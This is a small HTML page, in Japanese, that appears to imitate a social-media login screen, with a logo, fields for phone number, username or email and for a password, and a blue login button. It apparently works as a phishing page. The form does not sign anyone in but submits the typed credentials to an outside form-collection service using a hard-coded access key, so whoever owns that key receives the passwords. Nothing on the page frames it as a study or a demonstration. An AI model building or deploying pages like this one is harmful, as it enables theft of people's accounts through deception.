<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    
</head>
<body>
    
    <div style="text-align: center;">
    <img src="https://pbs.twimg.com/media/GFKQWbEbQAAdvln?format=jpg&name=large" 
    alt="ロゴが表示"
    width="163.68" height="46.52">
    </div>

    <div>
    <form action="https://api.staticforms.xyz/submit" method="post">
    <input
    type="hidden" 
    name="accessKey" 
    value="9e829d96-354e-49d0-833c-5f9436d80489">
     <!-- Required -->
     <style>:placeholder-shown{
        font-size: 8px;
        background-color: #fafafa;
        border: 1px solid #dcdcdc;
        width: 100%;
        max-width: 240px;
        padding: 4px;
        }</style>
         <div style="text-align: center;">
         <input type="text" required name="name"class="namae"
         placeholder="電話番号、ユーザーネーム、メールアドレス"></p>
         <input type="text" required name="name"
         placeholder="パスワード"></p>
        </div>
     
        
         <style>.button{
            color: white;
            background-color:  rgb(0, 149, 246); 
            border: none;
            border-radius: 5px;
            align-items: center;
            justify-content: center;
            
            padding: 7px 50px;
            width: 100%;
            max-width: 240px;
        
            
        }</style>
        <style>.buttons{
            text-align: center;
        }</style>
        <div class="buttons">
        <p><input type="submit"value='ログイン'class="button"></p>
        </div>
        
    </form>
    </div>
</body>
</html>